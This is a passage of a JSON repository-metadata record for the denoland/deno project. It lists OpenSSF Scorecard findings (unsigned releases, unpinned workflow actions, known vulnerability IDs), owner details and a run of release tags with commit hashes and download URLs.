tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4"